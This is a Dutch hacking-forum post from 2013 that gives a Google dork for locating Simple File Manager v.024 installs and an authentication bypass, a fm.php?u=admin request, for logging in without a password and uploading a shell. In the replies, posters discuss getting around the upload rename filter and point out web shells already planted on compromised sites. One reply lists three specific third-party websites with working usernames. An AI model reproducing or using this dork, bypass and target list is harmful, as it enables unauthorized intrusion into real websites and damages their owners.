File manager [Google Dork]

[../v4/images/70x40/file-manager-google-dork_1276.jpeg]
Dit is een google dork voor Simple File Manager v.024, waarbij je zonder wachtwoord kan inloggen.
Dit is een google dork voor Simple File Manager v.024, waarbij je zonder wachtwoord kan inloggen.

Dork
Ga naar google en zoek naar
"simple file manager .024"

Vervolgens zoek je naar de pagina fm.php, deze is vulnerable bij versie .024 (niet getest op lagere versies)

Het enige wat je nodig hebt is de username, deze is vaak al standaard ingevoerd. anders kan je iets als 'admin' proberen.

De exploit
Ga naar de pagina fm.php en typ daar achter ?u= en dan de gebruikersnaam.
Dus bijvoorbeeld: http://www.exploitable-site.com/fm.php?u=admin
Deze versie van Simple File Manager controleert op deze manier niet op een wachtwoord, als het goed is ben je nu binnen. upload je shell of doe whatever je niet laten kan.


Fix?
Op de site http://onedotoh.sourceforge.net/ staat nog geen nieuwe versie, hoewel ze een nieuwere versie als live demo gebruiken. Dus voor zover ik weet is er nog geen patch gereleased.

Reacties (5)

 
Opvallend dat ook veel websites die open staan een bestand genaamd 'blacksym.php' hebben.
Lijkt erop dat iemand anders ook wist van het lek.
 
ja omdat het ook public is. iedereen kan t weten als ie ff googled.
 
Citaat van: "RaMp6"
ja omdat het ook public is. iedereen kan t weten als ie ff googled.

Gewldig,

Maar als ik PHP scripts upload veranderd die de naam automatisch naar .php.off .... Ik heb de null byte exploit geprobeerd maar dat werkte ook neit!

eeeen... Dan kom je hier op uit:
http://media.govtech.net/EREPUBLIC_WEBS ... t-List.pdf

Edit:
We zijn niet de enigen :D
http://media.govtech.net/Alan/x1337.php.off
Ik denk niet dat daar zomaar hoort
 
Ik heb er 3 gevonden:

http://www.echovalleygraphics.com/fm.php?u=designstaff
http://www.studiomas.com/riservato/fm.php?u=studiomas
http://www.impactcatering.co.uk/pdf/fm.php?u=admin

Bij de laatste werkt het uploaden van .php bestanden wel, maar extensies worden veranderd in .php.off helaas.
Hacken is strafbaar.. Dus doe niet al te gek met die websites :P
 
[Reactie plaatsen]

Details

Avatar RaMp6
Door: RaMp6
Categorie: Exploits
24/6/2013 16:07
980x bekeken

Opties

Ik vind dit: Leuk  Niet leuk
Leuk
1
Niet leuk
0
Naar boven